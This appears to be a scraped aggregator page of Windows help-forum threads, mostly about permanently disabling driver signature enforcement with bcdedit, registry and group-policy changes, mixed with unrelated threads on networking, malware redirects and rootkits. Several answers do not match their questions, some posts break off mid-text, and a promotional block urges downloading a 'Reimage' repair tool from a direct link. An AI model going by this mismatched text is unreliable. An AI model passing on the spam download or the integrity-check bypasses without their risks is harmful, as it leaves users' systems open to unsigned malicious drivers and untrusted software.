need help with enabling and disabling signed driver enforcement in vista 64

Question: need help with enabling and disabling signed driver enforcement in vista 64

OK, I have come across 3 methods to disable driver signing with the bcdedit program on various websites:
bcdedit.exe /set testsigning on/off
bcdedit.exe /set nointegritychecks on/off
bcdedit.exe -set loadoptions DDISABLE_INTEGRITY_CHECKS

What are the differences between them and which one should I use? Oh, how do you re-enable driver signing for the DDISABLE_INTEGRITY_CHECKS method, if I use it?

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

Answer: need help with enabling and disabling signed driver enforcement in vista 64

I'm using the last one and to re-enable it type: bcdedit /deletevalue loadoptions

No, I'm not asking, how to... I'm telling you how to

In a shell with admin rights, enter:

bcdedit -set loadoptions DDISABLE_INTEGRITY_CHECKS

and yes, it's DD... no typo. Reboot and enjoy.

As you know in Windows 8.1 you can use Shift + Restart combination to disable driver signature enforcement. But the problem is this is not a permanent way for disabling... Every time you must do that.
I have read that the following commands can do permanently:

Code:
bcdedit -set loadoptions DISABLE_INTEGRITY_CHECKS
bcdedit -set TESTSIGNING ON

Having tested the above commands. Although after restarting windows I see a watermark that I'm in Test Mode but I would not able to install my unsigned driver. I am able to install my unsigned driver by shift + restart way only.

First, do those commands still work on Windows 8.1 64bit?
Second, what would you recommend to disable driver signature enforcement permanently?

I have an Xbox Controller S running on XBCD drivers for my Windows 8 computer. When I used these drivers on my Windows 7 laptop, I used DSEO to enable test mode, and it worked perfectly. Using the same method sends Windows 8 into a BSOD, so that's out of the question. The other solution is to reboot from the Settings menu and manually disable it at EVERY STARTUP. Not something I want to be doing, for it will probably wear out something in the computer before long. So, is there any other ways to disable DSE without rebooting every time I want to use the controller?

My computer is a 5-month old ASUS M11BB, 3.7GHz AMD A4, with Win8 64-bit installed, if that's any help.

Answer:Disabling Driver Signature Enforcement, permanently.

Win+X then press AType: shutdown /r /o /t 0 <==== system will reboot to Recovery ModeTrouble Shoot->Advanced->Startup Settings->Disable Driver Signature

Hope this helps !!!

Some driver I have is messed up and my computer keeps trying to go through start up repair. Start up repair of course never works so i can't start windows normally.

I noticed though that if I disabled driver signature enforcement, then my computer can get to the login screen. I thought this had solved my problem but after logging in this way, I get a fake antivirus coming up, then shortly after a BSOD.

What I did on previous computers when something like this happened is go into safe mode, but like normal startup it cannot load and instead goes to startup repair.

The problem here is that when I get to advanced startup options, only one or the other (Disable Driver Signature Enforcement, or safe mode) can be picked.

How do I use both of these options simultaneously?
If you have another suggestion other than what I'm trying feel free to share that too.

Answer:I need to run safe mode while disabling driver signature enforcement

You could try this

Startup Repair Infinite Loop Recovery

If you are having trouble Starting Windows normally - Or try a system Restore to a Point Before this happened

Hello. I've had to partially reinstal my Win8. This means I lost almost all my software and drivers. Now I have the headache again. On previous OS instance I had somehow disabled strict drivers signature (WHQL) control, so I was able to install even unsigned drivers like betas. Now on new OS, the annoying messages popup again and I can't for god remind where I had it disabled.
What I have:
- uninstalled defender
- disabled UAC by sliding the slider down (however UAC is still reported as active in Security Center - a guide to totally get rid of UAC would come useful )
- This hack doesnot remove the problem.
I know for sure this control can be disabled like I was able to install almost everything previously.

Tried also this hack and it doensot work:

Bump, nobody has an idea?
The particular driver I have the restrictions on is latest Intel HD Graphics driver beta - https://downloadcenter.intel.com/Det...&DownloadType=

I am having a heck of a time. I have installed Windows Vista Home Premium 64 Bit and the ASUS P5QC mobo I have came with an unsigned 64 bit Atheros AR8121/AR8113/AR8114 PCI-E Ethernet Controller
driver.

I called ASUS tech support and talked to them and as of this time, they have only a beta version of the 64 bit signed driver. Vista is not accepting the driver and is considering it as unsigned, so I am left without a computer that can connect to the net.

I have searched hi and low all over the internet to see if I could buy a wired ethernet adapter which has a 64 bit signed driver, but all of the ethernet cards I have been able to find are only compatible with the 32 bit version of Vista or they only have unsigned drivers for their ethernet cards. This is really frustrating!

Does anyone know here WHO (what manufacturer, make, model) of a wired ethernet adapter card 10/100 or 10/1000/1000 (that does not cost a fortune - is retail version, not industrial or commercial)
I might be able to purchase that has the appropriate signed drivers - or

Question: Driver Enforcement

Has anyone figured out how to script out digital driver enforcement yet. Some particular programs I run get CAUGHT by MS through that enforcement. So far all I can do on reboot is F8 and then disable enforcement. This is a hassle because you have to do it every restart.\

Any help would be great.

Answer:Driver Enforcement

run these commands at elevated command prompt and unsigned drivers will run no need to f8 on reboot

Answer:Enabling And Disabling Internet

yea, to disable internet access, but keep lan access, change your gateway to 0.0.0.0. you now have lan access but no net access. to disable all lan acess, go to device manager, right click and disable your network adapter.

to change your gateway>>
control panel>network>network connections>right click on the "local area connection">select properties>in the new window, scroll down until you see "internet protocol tcp/ip" then select properties. here is where you select "use the following ip address">then you fill in the blanks appropriately.
need any help with that please post back

I have  to use Freemind software which I understand is a desktop application. However , I have to install Java to use Freemind.

I've read so much about the vulnerability of Java I'm not sure what to do. My OS is Win 7 Pro and I use Firefox 34.0.5 and Google Chrome. I also have IE11 installed but rarely use it.

I would very much appreciate some advice  and guidance. I hope I'm in the right forum with my query!

Answer:Enabling and disabling Java

You can install it and then under the Java control panel (found under windows control panel once java is installed) you tick the "disable java content in the browser" box (or it might be untick the "enable java content in the browser" box i can't remember which way round the option is described). That way Java will only function as a desktop application for working with programs which you have installed and you will limit any vulnerabilities it causes. Also make sure to go through all your browsers and disable the java plugin juts incase the tick box alone was not enough. And keep Java up to date, you ought to change the settings on it's updater to check daily rather than the weekly or monthly which is set by default.

I look after a parish PC which I suspect has been interfered with by a mischief maker. The main problem is that the CD-ROM is no longer recognised by Windows (Windows 98 SE).The CD-ROM is working, and is recognised at Boot Up. It can also be accessed by starting up in DOS using a Windows Start Up Disc.I strongly suspect that the CD-ROM has been disabled in Windows, as the "mischief maker" has also deleted files which need to be reinstalled via the CD-ROM.Is my diagnosis correct? Can a CD-ROM be disabled in Windows? And, if so, how do I re-enable the CD-ROM?

Answer:Disabling / Enabling CD-ROM in Windows

Start/control panel, choose network and sharing centre, about a third of the way down on the right of the page you should see a network listed next to "connections" double click it and you should see a disable or enable switch (button) bottom centre.alternatively ,you could, right click on "computer" and choose properties.then choose device manager, scroll down to network adapters and see if its working (no yellow triangle . open and double click your adapter/choose driver ,and choose uninstall driver , restart your PC and windows will detect your hardware and reinstall the driver ,it should also reset the default settings for this driver.

Hi, new here.

Trying to put Windows 7 Realtek AC'97 5.37 (6.0.1.6305) drivers downloaded directly from Realteks site onto my Windows 7 Home Premium 32bit PC (w/ latest updates) but during installation, I continue to get the popup about the "Windows cannot verify the publisher of this driver software". When I tell it to install anyway, the popup goes away then re-appears again and just does this infinitely.

I have taken multiple steps to stop the driver signature enforcement of windows security starting with running in Test mode and then also admin cmd line bcdedit.exe -set loadoptions DDISABLE_INTEGRITY_CHECKS
bcdedit.exe -set TESTSIGNING ON

and the security warning continues to pop up. Additionally I have to click on the 'Do not install drivers' about 20 times before it goes away and the driver installation stops and self uninstalls that which has been installed halfway through.

I'm curious about this solution but I am unsure it will work without doing harm.

Does anyone know of a solution that I can do within windows so I can install my audio drivers?

Answer:Driver's blocked by Driver Signature Enforcement

Extract them and try to install them from device manager.

I try to delete the registry key but I can't delete it.
Going through the Run registry and found it but it keeps coming back.

What should I do.
I scanned my computer already with MBAM, Rogue Killer, Microsoft Windows Defender yet I get no possible virus infection.

Moreover I try to reg query it like this one
reg query "HKCU\Software\Classes\FeiSholEpOohbCv" /v "sSqBn"
and the result is in the attachment
Maybe someone can help me get rid of this virus or what this thing called

Hi!

Forgive me if this has been a previous topic here. I did a search but was unable to find anything.

Whenever I jump online, I'm getting a window that asks me if I want to enable or disable "macros."

I recently fired Norton's from my computer and am now using AVG for my virus protection and Ad-Aware for my anti-spyware program.

Suddenly I'm getting these macro alerts.

What are these macros, should you allow or block them, and why is this suddenly an issue for me?

Thanks in advance!

That's strange. Open Microsoft Word and go to Tools -> Macro -> Security and see if the macro level is set to high or medium. Set it to high and see if the warnings disappear.

I need to disable driver signing enforcement in Vista x64. The only way that works is if I hold F8 and disable it that way, but doing that every time I boot sucks. I tried the bcedit.exe way, doesn't work apparently due to some update. Is there any other way?

Answer:Driver Signing Enforcement

Posted before but here we go again

The bcdedit commands must be run from an elevated administrator command prompt, followed by a reboot.

Bcdedit /set nointegritychecks ON
bcdedit /set loadoptions DDISABLE_INTEGRITY_CHECKS

Make sure you don't have any of the following updates installed

KB932596
KB938979
KB938194

These all reinforce driver integrity checks.

Hi everyone. I no longer have internet access from my home network ONLY on my desktop computer. Everything was working fine as always - then while I was in my Network and Sharing Center, and clicked on my ethernet connection, 'Local Area Connection 3', I accidentally disabled it. No big deal I thought, so I re-enabled the connection. Except for some reason, my connection is all screwed up now. The name of this connection was and always has been 'dkm2' and now it just says 'Network', with no internet access. I have unplugged the cord and plugged it into this laptop and it immediately recognizes 'dkm2' and connects flawlessly, so I know the problem is on the desktop computer's end, and not the cable or router. I have tried reinstalling the ethernet adapter, as well as reinstalling/updating all drivers for it. The network diagnostic tool turns up with a message that says the connection between either my ethernet adapter or router and the Internet is broken. No matter what I seem to try, I can't get my connection to go back to it's normal 'dkm2' connection and stop giving me a generic, disconnected 'Network'. I can't figure out what could have changed. All that happened was the disabling and enabling of Local Area Connection 3. Any help is appreciated. Thank you.

I've had this issue before and a simple router reset fixed it last time. Not this time, however, and I have no clue what to do... I'll explain in detail whats going on...

I purchased a WNDR3400v2 probably around two months back and since then I haven't had any issues with it. Now, I like to keep the security setting on WPA2-PSK for the security but my brothers and my own Nintendo DS don't support this security for connecting. So, since my previous router had a guest network, I decided to activate and deactivate that network with no security when it was needed (Half hour or less), and I haven't had any issues until doing this with the WNDR3400v2.

Basically what happens is, after disabling the guest network again, no wireless devices can connect to the router... PERIOD... Upon trying to connect it also says "You are unable to connect) right after it verifies the password. I spent a few hours trying to fix it but I haven't gotten anywhere really..

What I have tried-v
-Resetting the Router
-Powercycling the Router
-Resetting it to factory defaults and restoring previous settings
-Enabling and disabling the network
-Deleting the original network saved on the computers and connecting as if from a new network.
-Also tried restarting my computers
-Updating the firmware (For some odd reason I couldn't find any firmware last week..)
I researched it a bit and found some solid leads, but nothing that fixed the issue. The only "Fix" ... Read more

Answer:After enabling and disabling guest network nothing will connect.

Why not use WPA-PSK? Most devices support that, and in practice it is just as secure as WPA2.

Sorry, but I have no clue about the cause of your current problem. Suggest that you make sure you have the latest firmware and then reset the router to factory defaults and reconfigure it.

Hi all,
I'd like to know how to disable AMD Radeon 6470M gpu, so that Intel HD 3000 gpu is used instead. It looks like the discrete gpu isn't switching to integrated gpu automatically when the gpu load is low, though I'm not sure. 2.Uninstall both the Intel and catalyst driver.

I just recently swapped my old HDD with brand new SSD and did a clean instal of Win 7 home preamium 64 bit. After I downloaded synaptics v17.0.19 (appears as Synaptics PS/2 Port TouchPad in Device manager) straight from Synaptics homepage, I noticed that that most of the gestures work, BUT the orange LED that indicates a disabled touchpad, is glowing when the touchpad is actually on. I disabled the touchpad from settings and the LED turned off. The double tapping in the upper left corner does not work either. In Mouse properties -> device settings -> Synaptics LuxPad V7.5 settings -> Tapping I can only configure tap zones in each corner of the touchpad, but not enable the upper left side double tapping which should disable/enable the touchpad. Does anyone have any idea why is the LED on in vice versa situations and why doesn't the double tapping trick work?  I have tried uninstalling the driver, but no luck.

Hi all,

I finally broke down and decided to make an account as ask for some help. Really trying to get this working normally again.

As stated in the title when I plug in my USB wireless device to my Desktop Tower, the device appears in the task-bar and adapter screen to continuously enable and disable itself. It does not work or scan wireless networks. I was toying with VirtualBox trying to get Linux to recognize the device and such, and something happened along the way that seemed to corrupt this device in Windows. I've since restored my system to before VirtualBox was installed but that didn't fix the issue.

The facts:This happens on any USB port
It's not the device, as it works fine on my other computers
It's not the USB ports, since my other wireless USB mini stick works on them
I've tried uninstalling the driver and deleting it and restarting - does not work
Interestingly, when I disable the WLAN AutoConfig service, the issue does not happen, it appears this begins to happen once the device is invoked for something - such as detecting wireless networks
While the issue is happening if I try to manually enable the adapter during this cycle, or if I right click the USB taskbar icon and try to disconnect it - I will get a BSOD

Any ideas? There seems to be something in Windows, some registry setting or something that's causing this behavior. Is there a way to make the system forget this device ever existed in every regard? Again, it works on my other Windows 7 mac... Read more

From the Metro Start Screen, open Settings (move your mouse to the bottom-right-corner of the screen and wait for the pop-out bar to appear, then click the Gear icon).
Click ?More PC Settings?.
Click ?General?.
Scroll down, and click ?Restart now? under ?Advanced startup?.
Wait a bit.
Click ?Troubleshoot?.
Click ?Advanced Options?
Click ?Windows Startup Settings?
Click Restart.

I can't follow or use these steps because whenever I click on a Metro setting it just stays there, nothing happens, I don't get take to General or an Metro setting I want.

Please help.

I really need to disable driver signature enforcement on W8 RP x86

Answer:Disable driver signature enforcement

First, you only have about 6 weeks before the RP expires. Why not get the final version? Or at least use the 90 day trial, which will last longer.

Second, did you disable UAC? Many things don't work in Metro if you disable UAC.

I am trying to install a 3rd party driver which Windows 8 won't allow me, so I have been googling a lot on how to and found that I need to disable the Driver Signature Enforcement. I have tried this: "General -> Advanced Setup -> Restart Now -> Troubleshoot -> Advanced Options -> Windows Startup Settings -> Restart".
And when it reboots it just reboots like normal and I log in and nothing changes(Meaning I never came to this screen: http://www.mk3000.it/wp-content/uplo...nforcement.jpg). I do have dual boot with Windows 8 and Ubuntu.

does anyone have any idea on how I can install this driver on Windows 8?

ps. I have also tried this:
Step 1. Open the Windows command promt as ?Run as Administrator?.
Step 2. Run ?bcdedit -set loadoptions DISABLE_INTEGRITY_CHECKS? (without the ??).
Step 3. To finalize the process run ?bcdedit -set TESTSIGNING ON? (without the ??).
Step 4. Reboot and you?re done.

There are 2 ways:

1) Registry

HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Driver Signing\BehaviorOnFailedVerify

Set as DWORD = 0

2) Command Prompt: Make sure you "Run as Administrator"

bcdedit.exe -set loadoptions DDISABLE_INTEGRITY_CHECKS
bcdedit.exe -set TESTSIGNINGON

Please note that this can be very DANGEROUS!

hi.i'musing a netgear wifi adapter wn111v2,driver 3.5.0.7 which is the latest for w7.the driver installs but will not work because i get a message:this driver is not digitally signed by microsoft.one would think netgear would get their driver signed.the only way it will work is if i press f8 on reboot and stop driver signature enforcement.is there a way to stop driver signature enforcement permanantly as it gets tiresome to press f8 on every reboot. thanks.

Answer:[SOLVED] driver signature enforcement

If you want to turn off device driver signing in Windows 7 completely, do the following.
Hit the Win+R keys together to open the run dialog. Type gpedit.msc to open the local groups policy editor.

Expand ‘Administrative Templates’ (it’s under ‘User Configuration’). Expand ‘System’. Click ‘Driver Installation’.

In the right panel, double click on ‘Code Signing for Device Drivers’.

Choose ‘Enabled’ in the window that appears. In the underlying options, choose ‘Ignore’. This disables drivers signing in Windows 7, and now you can install unsigned drivers in Windows 7.

Click Apply, OK. Restart your computer to install unsigned drivers.

Only been here an hour and already on to my second problem, lol.

So my only other problem is one little hardware adapter that has 64bit drivers... but they're not signed.

Is a "Syba" Serial to USB Adapter (SY-USB-S)...

basically I need to use it so that my battey backup can talk with Windows and give reports on power spikes etc... as well as control the shutdown of windows when I'm not around if there's a power outage.

Now, it's not a huge deal as the battery backup will still work of course, but the extra features won't work until Windows can communicate with it. Unfortunatly the backup only as a serial connection (and my motherboad doesn't) so I'm forced to use the "Serial (RS232) to USB" adapter.

So I'm wondering a few things.

1) can I force Vista x64 to use the unsigned driver from the company?

2) can I trick Vista x64 into thinking the driver is signed? (or someone mod the drive to that it is signed by me?)

3) Anyone know of a signed driver from another company that will work with this item? I assume a few companies use the same chip inside the device. All it does is make a bridge from USB to serial so it's a pretty simply device as well.

4) Anyone know of another Serial to USB adapter that has singed drivers that I could purchase to replace the current one?

Thanks again for any advice or help,
TK.

Friends I have a Gateway NV52L15U amd a8-based 15" laptop with win 8.
it works pretty well except for a few things that I suspect are related, and I suspect all three are due to how 8 is managing the drivers of the devices
- Network performance, in terms of starting up, latching the WIFI AP successfully, and getting online, is unreliable. oddly, it seems that it does not like disabling the Ethernet [CAT5] device, leaving the WIFI enabled. If I leave both enabled, wifi performance seems more stable [gaining and holding the connection]

- When I disable the CAT5 connection using the windows 8 adapter settings pane, the utility will hang, but not consistently. sometimes it hangs until it is forced to stop via taskmanager or restart, but not always. sometimes it merely takes a VERY long time - showing the hated hourglass while it takes as long as 7-8 minutes.

- Shutdowns and/or restarts can take an extremely long time. However, it seems again that if both network adapters are enabled [builtin wifi and builtin Ethernet] the reboot or shutdown seems to go a bit more normally.

- Sometimes the WIFI will not actually connect, as evidenced by IE and/or Chrome being unable to access the network. if I check windows using the taskbar widget, it will show the system "Connected to .." the AP and having "Internet Access". That little utility is mis-reporting. When I DISABLE the WIFI adapter via control panel util, the little taskbar widget may, or may not, still... Read more

Answer:Win8 not managing well enabling/disabling network adapters

Hi cognus,

You seem pretty well versed in troubleshooting so I doubt that I can help you; however, I will make the following statements based on my experience with Windows 8 and this experience comes from using a desktop and Laptop on a daily basis:

Win 8 is the fastest starting OS I've ever used - 6 second boot to desktop
Win 8 has the fastest shutdown times I've ever experienced - desktop about 1-2 seconds, laptop about 3-5 seconds
My laptop has no wifi connectivity issues under Win 8 - in fact, I could almost swear that it is running faster than Win 7

Now, if I were you, and I were starting to troubleshoot this issue, I would be focusing on the connectivity to the router, the protocols being used by your desktop and laptop, and the capabilities of the router. So, is the router Win 8 Ready. Can it handle both IPV4 and IPV6? The reason I'm focusing my attention in that area is because I had an old router when I first installed Win 8 and my connection speeds seemed to be suffering a bit; however, once I upgraded my router to one with 10/100/1000 ports that was IPV4 and IPV6 capable (eg Win 8 ready), everything improved immensely. Please understand that I am just generalizing here so take the information for what it might be worth. Good luck.

Oh, one more thing. Did you do a clean install of Win 8? If so, what partition structure did you end up with? 350MB system reserved + the rest to C: (for a legacy install)? If not, and you somehow did a Win 8 install, using the origin... Read more

I was wondering if it was at all possible to create a batch file to enable and disable my second display (which is actually a tv)

The command would have to turn on the display, and also change its location relative to my primary display. I wouldn't even know where to start; Google doesn't yield any fruitful results.

Any input is much appreciated, thank you

This is on Vista, but that shouldn't make a difference.

Answer:Possible to write a batch file for enabling/disabling second display?

Are you looking for a 'batch file' which can power up a TV set, configure your display driver to operate with a particular dual-mointor output, and then 'position' certain applications on it? That sounds like an awfully ambitious ask!

I'm not particularly experienced with 'home theatre' stuff. Matter of fact I've only set up one such rig for myself, and played it by ear and instinct setting the thing up. I'd be quite interested hearing different approaches people have taken.

But what I did was this:
Hooked the TV up to the display card.
Configured that 'second monitor' with appropriate resolution and settings.
Dragged Media Center across onto it and then full-screened the application.

That's it. In use I need to use the TV's remote to power it up when needed, and select the appropriate input signal. Then launch Media Center. anyone operating Media Center can do so by using the Media Center remote. When acticity in Media Center takes 'focus' from activity on the PC, and displaying on the primary monitor, Alt+Tab (or other similar keypress combinations) gets focus back.
I can't see how it can be done any other way, really.

Bought a quality Bluetooth adapter on Amazon that is plug n play. I will utilize this bluetooth adapter from my PC to Soundbar to stream music and movies. However, the process to transition from Headset to Soundbar is tedious, but there has to be an easier way?

I currently game with my Wireless Astro A50 headset. When streaming music, I prefer to use my Samsung Soundbar equipped to my TV. Is there a program or something that I can easily enable my Soundbar with the Bluetooth besides the process below?

Process: After I turn on discover mode on Soundbar, I need to search for "Bluetooth" on PC to open up Bluetooth Settings. My Soundbar is listed as "Paired". However, it really isnt. So i need to "Remove Device", wait for 15-25 seconds for my Soundbar to be discovered again. After pairing it again, its finally connected. But then I'll still need to switch the Playback Device via Sound Settings.

(One thing i miss about my Mac, it was very easy to enable bluetooth devices on the fly.

Can someone point me to the registry key for enabling/disabling the Windows firewall? I am using Windows XP SP3. I looked this up on the internet and found these paths:HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfileHKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfileThe above paths do not exist. Does anyone know where this can be found?I am asking because on a computer I am working on the windows firewall is grayed out in both the user and administrator profiles. The computer came from a workplace where it was on a domain and the company had their own firewall, so they disabled it in both profiles. I am looking to enable it again through the registry. Thanks.

Answer:Finding registry key for enabling/disabling Windows firewall

Did some reading on this and it appears that all you do is delete the HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Firewall registry key and you'll be back to an enabled firewall.cpl. If you want to keep it grayed out and off, you would keep the key and enter a 0 in the folders I mentioned above OR if you want to keep it grayed out and on, you would enter a 1.

Hello guys,

I am using modified soundcard drivers, and a new version came out, so I uninstalled everything, rebooted into advanced setup, hit 7 to disable driver enforcement, but this didn't work magically. The drivers wouldn't install, not even older versions of the modified drivers (that I had just deleted previously). Only the original drivers from Creative would load. I then tried the DDISABLE_INTEGRITY_CHECKS and test mode, which did show up the test mode prompt and everything, but it still wouldn't install unsigned drivers. The only thing I have changed since being able to install them without problems is that I've downloaded a bunch of windows updates. What could be the problem?

Thanks for your time!

Answer:Cannot disable Driver Signature Enforcement anymore

System Restore prior to updates. Do not delete older drivers, just select the new ones. If all OK, run Windows Update again.

Does anyone know how to PERMANENTLY disabled driver signature enforcement in Windows

I have also tried:

The unsigned driver still fails to load after a reboot.

Hi!
My friend uses in his Windows 7 Ultimate SP1 x64 device which driver has no digital signature and when he select not at begin of boot disable driver signature enforcement, his device works not and in Device Manager is exclamation mark that device cannot work for driver signature missing.
So, when Windows starts he must always hit F8 to view advanced boot options and select this:

I have same problem with other device but in Windows 10.1607 Pro x64. I used BootUI Tuner to show advanced boot options always and I must hit 7 (or F7) to do the same - disable driver signature enforcement.

So, Q is simple: Is possible to disable driver signature enforcement permanently in Windows 7 and Windows 10? If, how?
Thank you for each help.

Answer:How to permanently disable driver signature enforcement?

Not that I have ever seen or possibility of leaving you system open to infections since it is probably not only drives that is protects. Most coding like that protect drives and software.

Why not just download the driver from the manufactures site and remove the one giving the issue and replace.

So this is my 14th or 15th time attempting to disable the driver signature enforcement so I can use motioninjoy to install my PS3 Controller driver to use for Rocket League. However, every time I run advanced startup, the process goes rather slowly before loading up my options. No worries at that point, but when I finally end up at the screen that has the options f1-f9, f7 being the disable driver enforcement, my computer immediately shuts off immediately after loading all of the options. I have no idea why it just shuts off... sometimes it shuts off just before it loads all of the options, but I have never been able to disable the driver signature enforcement thus far.

Any suggestions?

Hello,I am fairly new to this as I've always been able to remove my own spyware until now. A few days ago I was browsing a site when I saw a javascript install popdown on chrome for a second before my computer shut off (may not be relevant). When I tried to turn it back on, windows would not load and I tried several restore points, safe mode but nothing worked. After almost giving up, I tried disabling windows driver enforcement and sure enough that worked. I have to do that every time in order for windows to boot. Since this problem occurred, I get redirected when I look things up on google to other search engines, coupon sites, and things that are targeted to my location (germany). When searching on google, my first pages of results are often filled with strange links like this: eiimn.wo.tc/14850k.html that will have the word content of what i'm searching in the preview of words, but using the google spyglass shows a bogus site. Many of these links are strange .html or .php endings and domain endings I had never seen. These for some reason make up most of the first page of the google search result. This seems to be mostly restricted to searches related to gaming. I read the tutorial on how to post the logs so I hope I didn't miss anything, if so, I apologize and will correct it! Thanks to anyone who could shed some light on my computer mysteries Cheers! Here are my Hijackthis and Malwarebytes logs.Logfile of Trend Micro HijackThis v2.0.4Scan sav... Read more

Ok first of,
thanks for reading my topic.
these problems have been bothering me for a week now,
and I can't seem to fix it by myself.

So it began last week, laptop blue-screend on me for no reason, restarted, and got stuck at the windows 7-64 repair screen.
created boot-disc, no good.
after some time, I disabled driver signature enforcement, and windows started. (wasnt prompted with a warning before blue-screen)

checked around for bad drivers, windows couldn't find any.
several anti mal/spy-ware progs later (spybot sd, super antyspyware, malwarebyte)
still the same.

but i've seen to have picked-up another problem, google redirect.
im getting redirected to some nasty sites.

Ive used all my knowledge on computers, and i thought final resort,

Hi. I was reading an article on a website when suddenly my computer restarted by itself. When it got to the part where it says Starting Windows, it restarted again. It would not go past that 'Starting Windows' part. I tried using Startup Repair from my Windows 7 installation disk but that didn't fix it. I tried to start up in Safe Mode. It only loaded some files before restarting again. The last file that it loaded before it restarted was CLFS.sys. I managed to get past the starting windows part by using Disable Driver Signature Enforcement. When I got to my desktop, a program called "Windows Recovery" started scanning my computer. It said I had to purchase their full module to repair my system. I knew it was virus so I went here to uninstall it. When I got back to my desktop again, I got a notification saying 'a program tried to change my default search engine' or something. When surfing, I would also get redirected to websites related to StopZilla. So I used system restore. When I did, I would no longer get redirected to websites related to StopZilla but I'd still get redirected to other websites such as jamcamslive.com, all-allergies.com and some other websites I forgot. Another problem I have is when I use my Administrator account, I would get a BSOD. I had to use a regular account so I wouldn't get that. I would appreciate any help I get. Here is the DDS.txt.

Answer:Can't disable Driver Signature Enforcement on advanced startup.

If is means anything, I looked through my system logs to find the Event ID 6006, or shutdown, and found 2 specific error events that appear just before the shutdown ID. They are both Event ID 10016 and Event ID 7031 or 7034. They are both labeled errors in the logs.

-F8 on reboot only does it for the session.

-"/bcdedit -set loadoptions \?DDISABLE_INTEGRITY_CHECKS" does not work.

-GpEdit.msc editting does not work.

Can this be done?

Answer:Permanently disable Driver Signing enforcement in 64bit

have you tried driver signature enforcement overrider?

it worked for me a couple of builds back. (i don't need it any more)

you only need to run it once, to turn it 'on'; then run it again at any time in the future to turn it 'off'.

happy overriding!

I've just bought a laptop with Windows 10 and a couple of days in I have a problem. It won't startup unless I select the "Disable Driver Signature Enforcement" option.

I have used sigverif to see what drivers I have unsigned. I was surprised to see some jpg and gif files from the Synaptics touchpad driver coming up. I uninstalled Synaptics, but that didn't solve the problem. Now no files are listed as being unsigned, but it still won't startup unless I disable driver signature enforcement.

I'm not sure what could be causing it. The last thing i did before the problem happened was that I was having some difficulty ejecting an external hard drive. It wouldn't eject so I just tried to reboot and that's when the problems started. Could these two things be linked?

Thanks
Saamah

Is there a way to auto-select 'Disable driver signature enforcement' without user manually pressing '7' or ''F7' so that windows always boot with driver signature enforcement disabled after reboot? All the other methods such as testsigning, nointegritychecks, ddisable_integrity_checks no longer works.
Thank you!

Answer:auto-select 'Disable driver signature enforcement'

a. Press the Win + X and click on Settings.

b. Switch over to the “Update & security” section.

c. Then click on the Recovery on the left hand side.

d. Once selected, you will see an advanced startup section appear on the right hand side. You will need to click on the “Restart now” button.
e. Once your Computer has rebooted you will need to choose the Troubleshoot option.
f. Then head into Advanced options.
g. Then Startup Settings.
h. Since we are modifying boot time configuration settings, you will need to restart your computer one last time.
I. Here you will be given a list of startup settings that you can change. The one we are looking for is “Disable driver signature enforcement”. To choose the setting, you will need to press the F7 key.

Hello forum members...
Im new to the Windows 7 OS (and this forum ) ,and have lately had problems installing AMD GPU drivers;after rebooting to windows 7 desktop,I get a popup error msg stating that there is no AMD driver found (tho I see it has installed in the control panel:Programs and Features!)?!

Ive tried disabling Driver Signature Enforcement at F8 screen, but that works for only the current user session then toggles back to "defaults" after another reboot!!

The crux of my question is how may i get windows to allow the (dunno if the ati drivers are unsigned, but have noticed a tag "WQ" on the ATI drivers...) AMD ATI GPU drivers to install without checking driver signatures permanently via cmd prompt or ??

I am trying to use an application to connect my PS3 controller to my PC but its drivers are unsigned. I am using windows 7 professional 64bit. Now apparently I should be able to hit f8 on startup and select an option to disable the driver enforcement but my rig has UEFI bios and I am not given that option. How can I disable this? The fix does not have to be permanent as I will not be using my PS3 controller everytime I start my computer so if you have a quick workaround that will work too. I have poked around in the bios and didn't see anything that clearly states any relation to driver signing so I figured I should check here before trying anything else. Thanks for your time.

Answer:Solved: Disable Driver Signing Enforcement (Windows UEFI)

I am not at all positive about this, but I think that you have to disable "Secure Boot" (in the UEFI BIOS).

Ok, so i've run into a large string of computer issues lately. My computer overheated, and I had to replace my power supply and video card. Since installing the video card, after my computer passes the
"starting windows" screen i get a blue screen with the error message stating that The initial session process or system process terminated
unexpectedly.     the only way that I can start my computer is if i disable driver signature enforcement. When I do that, the computer runs perfectly. The only problem is, I cannot leave my computer in that mode, because most of the games
that I like to play on this computer won't let me run them in that mode. Could REALLY use some help. Thanks.

Hello.Let's try this. Please download the TDSS Rootkit Removing Tool (TDSSKiller.exe) and save it to your Desktop. <-Important!!!Be sure to download TDSSKiller.exe from Kaspersky's website and not TDSSKiller.zip which appears to be an older version 2.3.2.2 of the tool.Double-click on TDSSKiller.exe to run the tool for known TDSS variants.
Vista/Windows 7 users right-click and select Run As Administrator. If TDSSKiller does not run, try renaming it.To do this, right-click on TDSSKiller.exe, select Rename and give it a random name with the .com file extension (i.e. 123abc.com). If you do not see the file extension, please refer to How to change the file extension.Click the Start Scan button.Do not use the computer during the scanIf the scan completes with nothing found, click Close to exit.If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.A log file named TDSSKiller_version_date_time_log.txt (i.e. TDSSKiller.2.4.0.0_27.07.2010_09.o7.26_log.txt) will be created and saved to the root directory (usually Local Disk C:).Copy and paste the contents of that file in your next reply.~BladeIn your next reply, please include the following:TDSSKiller Log

I'm sure many of you are aware of Microsoft shenanigans requiring digital signatures FOR ALL DRIVERS. Now the only way to get around this bull is to F8 on every boot and to select to start windows without enforcing it. I've tried every possible technique on the interwebs involving using the command prompt to disable this with no success, all I want is to be able to do is use Rivatuner on my laptop .

Answer:Vista 64 RAGE, digital signature enforcement

Just set it up as a scheduled task to run at log on, entering an admin user name and password to run as. Same answer as every time this comes up (too) often.

Hello Everyone,

I am looking for a solution to a problem which started to occur today.

Last night I was prompted by Windows to do some updates, after they had finished my computer shut down normally. When I booted my computer today I was greeted by the BSOD with the following error code:

Stop: c000021a. The initial session process ... terminated unexpectedly with a status of 0x00000000 (0xc0000428 0x000106a0).

